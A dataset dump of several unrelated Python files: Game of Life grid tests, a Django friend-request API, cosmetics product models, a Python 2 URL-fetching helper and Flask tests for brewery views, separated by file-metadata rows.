assert grid.get_cell(0, 0) == 1
def test_on_a_2x2_grid_populates_some_positions():
grid = Grid(width=2, height=2)
grid.populate_cells([(0, 1), (1, 1)])
assert grid.get_cell(0, 0) == 0
assert grid.get_cell(0, 1) == 1
assert grid.get_cell(1, 0) == 0
assert grid.get_cell(1, 1) == 1
# invididual cell evolution calculations
def test_on_a_1x1_grid_evolution_calculations_dont_error():
grid = Grid(width=1, height=1)
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
def test_on_a_2x2_grid_evolution_calculations_dont_error():
grid = Grid(width=2, height=2)
grid.populate_cells([(0, 1)])
grid.advance_generation()
assert grid.get_cell(0, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_survives_if_has_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1), (0, 1), (1, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 1
def test_on_a_3x3_grid_a_centered_cell_survives_if_has_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1), (0, 1), (1, 2), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 1
def test_on_a_3x3_grid_a_centered_cell_dies_if_has_no_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_dies_if_has_less_than_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 1), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_dies_if_has_more_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(1, 0), (1, 1), (2, 0), (2, 1), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_space_reproduces_if_has_exactly_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 2), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 1
def test_on_a_3x3_grid_a_centered_cell_space_doesnt_reproduces_if_has_less_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_centered_cell_space_doesnt_reproduces_if_has_more_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 2), (2, 1), (2, 2)])
grid.advance_generation()
assert grid.get_cell(1, 1) == 0
def test_on_a_3x3_grid_a_topleft_cell_survives_if_has_exactly_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1), (1, 0)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 1
def test_on_a_3x3_grid_a_topleft_cell_survives_if_has_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1), (1, 0), (1, 1)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 1
def test_on_a_3x3_grid_a_topleft_cell_dies_if_has_less_than_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
def test_on_a_3x3_grid_a_topleft_cell_dies_if_has_no_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
def test_on_a_3x3_grid_a_topleft_cell_space_reproduces_if_has_exactly_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 0), (1, 1)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 1
def test_on_a_3x3_grid_a_topleft_cell_space_doesnt_reproduces_if_has_less_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 0)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
# full grid/matrix evolution calculations
def test_given_a_1x1_grid_a_full_snapshot_tick_returns_another_1x1_grid():
grid = Grid(width=1, height=1)
grid.populate_cells([(0, 0)])
grid.advance_generation()
assert len(grid.matrix) == 1
assert grid.matrix[0] == 0
def test_correctly_snapshot_ticks_a_3x3_grid_with_centered_cell_and_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1), (1, 0)])
grid.advance_generation()
assert len(grid.matrix) == 3*3
# space at position (1,1) spawned a cell as it has 3 adjancent
assert grid.matrix == [1, 1, 0, 1, 1, 0, 0, 0, 0]
| 29.99435 | 99 | 0.701827 | 914 | 5,309 | 3.699125 | 0.09628 | 0.021295 | 0.088435 | 0.110618 | 0.835552 | 0.827566 | 0.798285 | 0.754511 | 0.710441 | 0.696835 | 0 | 0.064567 | 0.162743 | 5,309 | 176 | 100 | 30.164773 | 0.696063 | 0.031456 | 0 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254386 | 1 | 0.201754 | false | 0 | 0.008772 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad85a5c714049ac49573f948c5905839d5b477db | 8,823 | py | Python | friends/views.py | alldevic/swtest | 9578d4da6b468c8d7072b5673c75b14bd95ef9fa | [
"MIT"
] | null | null | null | friends/views.py | alldevic/swtest | 9578d4da6b468c8d7072b5673c75b14bd95ef9fa | [
"MIT"
] | null | null | null | friends/views.py | alldevic/swtest | 9578d4da6b468c8d7072b5673c75b14bd95ef9fa | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.db.models import Q
from djoser.serializers import UserSerializer
from drf_yasg.utils import swagger_auto_schema
from rest_framework import viewsets
from rest_framework.decorators import action
from django.core.exceptions import ValidationError as DjangoValidationError
from rest_framework.serializers import ValidationError
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from .models import Invite
from.serializers import (
PostInviteSerializer,
)
User = get_user_model()
class MeViewSet(viewsets.ViewSet):
permission_classes = [IsAuthenticated]
@action(detail=False)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def friends(self, request):
"""
Метод возвращает список друзей текущего пользователя
"""
user_id = int(request.user.id)
invites = [x for x in Invite.objects
.only("id",
"from_user_id",
"to_user_id")
.filter(confirmed=True)
.filter(Q(from_user=user_id) | Q(to_user=user_id))]
users = set(
[x.from_user_id for x in invites if x.to_user_id == user_id])
users.update(
[x.to_user_id for x in invites if x.from_user_id == user_id])
friends = User.objects.filter(id__in=users)
serializer = UserSerializer(friends, many=True)
return Response(serializer.data)
@action(detail=False)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def input(self, request):
"""
Метод возвращает список пользователей, от которых есть непринятые входящие заявки
"""
user_id = request.user.id
invites = [x for x in Invite.objects
.only("id",
"from_user_id")
.filter(confirmed=False, to_user=user_id)]
users = [x.from_user_id for x in invites]
input_users = User.objects.filter(id__in=users)
serializer = UserSerializer(input_users, many=True)
return Response(serializer.data)
@action(detail=False)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def output(self, request):
"""
Метод возвращает список пользователей которым отправлены заявки
"""
user_id = request.user.id
invites = [x for x in Invite.objects
.only("id",
"to_user_id")
.filter(confirmed=False, from_user=user_id)]
users = [x.to_user_id for x in invites]
output_users = User.objects.filter(id__in=users)
serializer = UserSerializer(output_users, many=True)
return Response(serializer.data)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
201: UserSerializer,
})
def invite(self, request):
"""
Метод создает запрос в друзья по заданному id пользователя
"""
try:
user_id = int(request.data['user_id'])
self_id = request.user.id
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
invite = Invite(from_user_id=self_id, to_user_id=user_id)
invite.clean()
invite.save()
res = UserSerializer(invite.to_user)
return Response(res.data, status=201)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
201: UserSerializer,
})
def accept(self, request):
"""
Подтверждение дружбы
"""
try:
user_id = int(request.data['user_id'])
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
invites = Invite.objects.filter(from_user_id=user_id)
if invites.count() != 1:
raise ValidationError("Приглашения не существует")
invite = invites.first()
if invite.confirmed:
raise ValidationError("Приглашение уже принято")
invite.confirmed = True
invite.save()
res = UserSerializer(invite.from_user)
return Response(res.data, status=201)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
201: UserSerializer,
})
def decline(self, request):
"""
Отклонение запроса на дружбу
"""
try:
user_id = int(request.data['user_id'])
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
invites = Invite.objects.filter(from_user_id=user_id)
if invites.count() != 1:
raise ValidationError("Приглашения не существует")
invite = invites.first()
if invite.confirmed:
raise ValidationError("Приглашение уже принято")
invite.delete()
res = UserSerializer(invite.from_user)
return Response(res.data, status=201)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
200: UserSerializer,
})
def delete(self, request):
"""
Отклонение запроса на дружбу
"""
try:
user_id = int(request.data['user_id'])
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
invites = Invite.objects.filter(from_user_id=user_id)
if invites.count() != 1:
raise ValidationError("Приглашения не существует")
invite = invites.first()
if not invite.confirmed:
raise ValidationError("Приглашение еще принято")
invite.delete()
res = UserSerializer(invite.from_user)
return Response(res.data, status=200)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
class UserIdViewSet(viewsets.ViewSet):
permission_classes = [IsAuthenticated]
@action(detail=True)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def friends(self, request, pk=None):
"""
Метод возвращает список друзей для заданного пользователя
"""
user_id = int(pk)
invites = [x for x in Invite.objects
.only("id",
"from_user_id",
"to_user_id")
.filter(confirmed=True)
.filter(Q(from_user=user_id) | Q(to_user=user_id))]
users = set(
[x.from_user_id for x in invites if x.to_user_id == user_id])
users.update(
[x.to_user_id for x in invites if x.from_user_id == user_id])
friends = User.objects.filter(id__in=users)
serializer = UserSerializer(friends, many=True)
return Response(serializer.data)
| 32.318681 | 89 | 0.595149 | 925 | 8,823 | 5.518919 | 0.143784 | 0.064643 | 0.023506 | 0.018805 | 0.817042 | 0.781587 | 0.759452 | 0.738688 | 0.723996 | 0.702449 | 0 | 0.013071 | 0.314972 | 8,823 | 272 | 90 | 32.4375 | 0.831569 | 0.044656 | 0 | 0.768844 | 0 | 0 | 0.044396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040201 | false | 0 | 0.060302 | 0 | 0.221106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad97a438f174dc71ca6055a582fcf7bfa7caa9ac | 2,497 | py | Python | App/app/models.py | GodCm/Cosmetics-Recommend | 88f4dbb4f5ed37d145728c40f289207836ecb12b | [
"Apache-2.0"
] | 1 | 2018-12-05T02:19:07.000Z | 2018-12-05T02:19:07.000Z | App/app/models.py | GodCm/Cosmetics-Recommend | 88f4dbb4f5ed37d145728c40f289207836ecb12b | [
"Apache-2.0"
] | null | null | null | App/app/models.py | GodCm/Cosmetics-Recommend | 88f4dbb4f5ed37d145728c40f289207836ecb12b | [
"Apache-2.0"
] | null | null | null |
from django.db import models
class Comment(models.Model):
id = models.IntegerField(primary_key=True)
username = models.TextField(blank=True, null=True)
commit = models.TextField(blank=True, null=True)
com_time = models.TextField(blank=True, null=True)
type = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'comment'
class Lipstick(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'lipstick'
class Mask(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'mask'
class Perfume(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'perfume'
class BBCream(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'BBCream'
class UserModel(models.Model):
id = models.IntegerField(primary_key=True)
username = models.TextField(blank=True, null=True)
password = models.TextField(blank=True, null=True)
email = models.TextField(blank=True, null=True)
icon = models.TextField(blank=True, null=True)
reserver = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'users'
| 30.82716 | 57 | 0.693232 | 323 | 2,497 | 5.281734 | 0.126935 | 0.254982 | 0.339977 | 0.407972 | 0.896835 | 0.896835 | 0.803048 | 0.803048 | 0.803048 | 0.803048 | 0 | 0 | 0.19143 | 2,497 | 80 | 58 | 31.2125 | 0.844973 | 0 | 0 | 0.666667 | 0 | 0 | 0.015224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.016667 | 0.016667 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
d167c368671d134f1a190f52555c231ea8e56efe | 4,229 | py | Python | URLFunctions.py | cboulte1/BotFramework | d9d242f5b1cedd24cbbfac6f8ce3557eaff77723 | [
"MIT"
] | null | null | null | URLFunctions.py | cboulte1/BotFramework | d9d242f5b1cedd24cbbfac6f8ce3557eaff77723 | [
"MIT"
] | null | null | null | URLFunctions.py | cboulte1/BotFramework | d9d242f5b1cedd24cbbfac6f8ce3557eaff77723 | [
"MIT"
] | null | null | null | # URLFunctions.py
# Copyright 2011 - LiveSquare Security and Brett L. Scott - All rights reserved worldwide.
# This script is a centralized monitor of the LiveSquare Security Proactive Defense Network(tm).
# This script is CONFIDENTIAL AND PROPRIETARY. If you are not currently employed by
# LiveSquare Security, please close this file now and make no further attempts to read this
# file's contents.
# All contents below are CONFIDENTIAL and PROPRIETARY.
import httplib, urllib, urllib2
def GetURL(sURL, sParameters):
sScriptVer = "1.0.0"
# Do we need to append the HTTP part?
if sURL.find("http://") == -1:
sURL = "http://" + sURL
# Do we have parameters
if sParameters == "":
req = urllib2.Request(sURL)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if hasattr(e, 'reason'):
print 'We failed to reach a server.'
print 'Reason: ', e.reason
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
elif hasattr(e, 'code'):
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
print "Retreival error"
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
else:
# Encode the Parameters
sParameters = sParameters.replace(" ", "+")
req = urllib2.Request(sURL, sParameters)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if hasattr(e, 'reason'):
print 'We failed to reach a server.'
print 'Reason: ', e.reason
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
elif hasattr(e, 'code'):
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
print "Retreival error"
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
return sGetURLResponse
def GetURLSSL(sURL, sParameters):
sScriptVer = "1.0.0"
# Do we need to append the HTTP part?
if sURL.find("https://") == -1:
sURL = "https://" + sURL
# Do we have parameters
if sParameters == "":
req = urllib2.Request(sURL)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if hasattr(e, 'reason'):
print 'We failed to reach a server.'
print 'Reason: ', e.reason
elif hasattr(e, 'code'):
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
print "Retreival error"
sGetURLResponse = "URLFunctions.GetURLSSL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
else:
sParameters = sParameters.replace(" ", "+")
req = urllib2.Request(sURL, sParameters)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if hasattr(e, 'reason'):
print 'We failed to reach a server.'
print 'Reason: ', e.reason
elif hasattr(e, 'code'):
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
print "Retreival error"
sGetURLResponse = "URLFunctions.GetURLSSL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
return sGetURLResponse
| 38.099099 | 96 | 0.581225 | 439 | 4,229 | 5.589977 | 0.241458 | 0.02608 | 0.0326 | 0.03423 | 0.813366 | 0.813366 | 0.813366 | 0.813366 | 0.813366 | 0.813366 | 0 | 0.008696 | 0.32017 | 4,229 | 110 | 97 | 38.445455 | 0.84487 | 0.137148 | 0 | 0.915663 | 0 | 0 | 0.219472 | 0.012101 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.012048 | null | null | 0.240964 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d169b58d102bba2d9bca0a19bf3a851fc7408451 | 14,200 | py | Python | tests/test_brewery_views.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 3 | 2019-03-11T04:30:06.000Z | 2020-01-26T03:21:52.000Z | tests/test_brewery_views.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 23 | 2019-02-06T20:37:37.000Z | 2020-06-01T07:08:35.000Z | tests/test_brewery_views.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | null | null | null | import pytest
from flask import url_for
from markdown import markdown
from . import BrewlogTests
@pytest.mark.usefixtures('client_class')
class TestBreweryListView(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self):
self.list_url = url_for('brewery.all')
def brewery_url(self, brewery):
return url_for('brewery.details', brewery_id=brewery.id)
def delete_url(self, brewery):
return url_for('brewery.delete', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_nonowner(self, anonymous, user_factory, brewery_factory):
public_user = user_factory(is_public=True)
brewery_1 = brewery_factory(brewer=public_user)
hidden_user = user_factory(is_public=False)
brewery_2 = brewery_factory(brewer=hidden_user)
if not anonymous:
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.list_url)
assert f'href="{self.brewery_url(brewery_1)}"' in rv.text
assert f'href="{self.delete_url(brewery_1)}"' not in rv.text
assert f'href="{self.brewery_url(brewery_2)}"' not in rv.text
assert f'href="{self.delete_url(brewery_2)}"' not in rv.text
add_url = url_for('brewery.add')
assert bool(f'href="{add_url}"' in rv.text) is not anonymous
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_owner(self, public, user_factory, brewery_factory):
actor = user_factory(is_public=public)
brewery_1 = brewery_factory(brewer=actor)
self.login(actor.email)
hidden_user = user_factory(is_public=False)
brewery_2 = brewery_factory(brewer=hidden_user)
rv = self.client.get(self.list_url)
assert f'href="{self.brewery_url(brewery_1)}"' in rv.text
assert f'href="{self.delete_url(brewery_1)}"' in rv.text
assert f'href="{self.brewery_url(brewery_2)}"' not in rv.text
assert f'href="{self.delete_url(brewery_2)}"' not in rv.text
@pytest.mark.usefixtures('client_class')
class TestBreweryDetailsView(BrewlogTests):
def url(self, brewery):
return url_for('brewery.details', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert brewery.name in rv.text
assert f'action="{url}"' not in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_get_owner(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
rv = self.client.get(url)
assert f'action="{url}"' in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'name': 'new name'}
rv = self.client.post(url, data=data, follow_redirects=False)
assert rv.status_code == 403
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'name': 'new name'}
rv = self.client.post(url, data=data, follow_redirects=False)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_post_owner_ok(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
name = 'new name'
data = {'name': name}
rv = self.client.post(url, data=data, follow_redirects=True)
assert f'<h3>{name}</h3>' in rv.text
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_post_owner_fail(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
new_description = 'new description'
data = {'description': new_description}
rv = self.client.post(url, data=data, follow_redirects=True)
assert markdown(new_description) not in rv.text
@pytest.mark.usefixtures('client_class')
class TestBreweryDeleteView(BrewlogTests):
def url(self, brewery):
return url_for('brewery.delete', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert rv.status_code == 403
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_get_owner(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
rv = self.client.get(url)
assert f'<h3>{brewery.name}</h3>' in rv.text
assert f'action="{url}"' in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'delete_it': True}
rv = self.client.post(url, data=data)
assert rv.status_code == 403
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'delete_it': True}
rv = self.client.post(url, data=data)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_post_owner(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
data = {'delete_it': True}
rv = self.client.post(url, data=data)
assert rv.status_code == 302
assert url_for('profile.breweries', user_id=owner.id) in rv.headers['location']
@pytest.mark.usefixtures('client_class')
class TestBreweryCreateView(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self):
self.url = url_for('brewery.add')
def test_get_anon(self):
rv = self.client.get(self.url)
assert rv.status_code == 302
assert url_for('auth.select') in rv.headers['location']
def test_get_authenticated(self, user_factory):
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.url)
assert f'action="{self.url}"' in rv.text
def test_post_anon(self):
data = {
'name': 'brewery no 1'
}
rv = self.client.post(self.url, data=data)
assert rv.status_code == 302
assert url_for('auth.select') in rv.headers['location']
def test_post_authenticated(self, user_factory):
actor = user_factory()
self.login(actor.email)
name = 'brewery no 1'
data = {'name': name}
rv = self.client.post(self.url, data=data, follow_redirects=True)
assert f'<h3>{name}</h3>' in rv.text
@pytest.mark.usefixtures('client_class')
class TestBreweryBrewsView(BrewlogTests):
def url(self, brewery):
return url_for('brewery.brews', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_public(
self, anonymous, user_factory, brewery_factory, brew_factory
):
owner = user_factory(is_public=True)
brewery = brewery_factory(name='brewery no 1', brewer=owner)
public_brew = brew_factory(brewery=brewery, name='public brew', is_public=True)
pb_url = url_for('brew.details', brew_id=public_brew.id)
hidden_brew = brew_factory(brewery=brewery, name='hidden brew', is_public=False)
hb_url = url_for('brew.details', brew_id=hidden_brew.id)
if not anonymous:
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.url(brewery))
assert f'href="{pb_url}"' in rv.text
assert f'href="{hb_url}"' not in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(name='brewery no 1', brewer=owner)
if not anonymous:
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.url(brewery))
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_get_owner(self, public, user_factory, brewery_factory, brew_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(name='brewery no 1', brewer=owner)
public_brew = brew_factory(brewery=brewery, name='public brew', is_public=True)
pb_url = url_for('brew.details', brew_id=public_brew.id)
hidden_brew = brew_factory(brewery=brewery, name='hidden brew', is_public=False)
hb_url = url_for('brew.details', brew_id=hidden_brew.id)
self.login(owner.email)
rv = self.client.get(self.url(brewery))
assert f'href="{pb_url}"' in rv.text
assert f'href="{hb_url}"' in rv.text
@pytest.mark.usefixtures('client_class')
class TestJsonViews(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self, user_factory, brewery_factory):
self.endpoint = 'brewery.search'
self.public_user = user_factory(is_public=True)
self.public_brewery = brewery_factory(
brewer=self.public_user, name='public brewery'
)
self.hidden_user = user_factory(is_public=False)
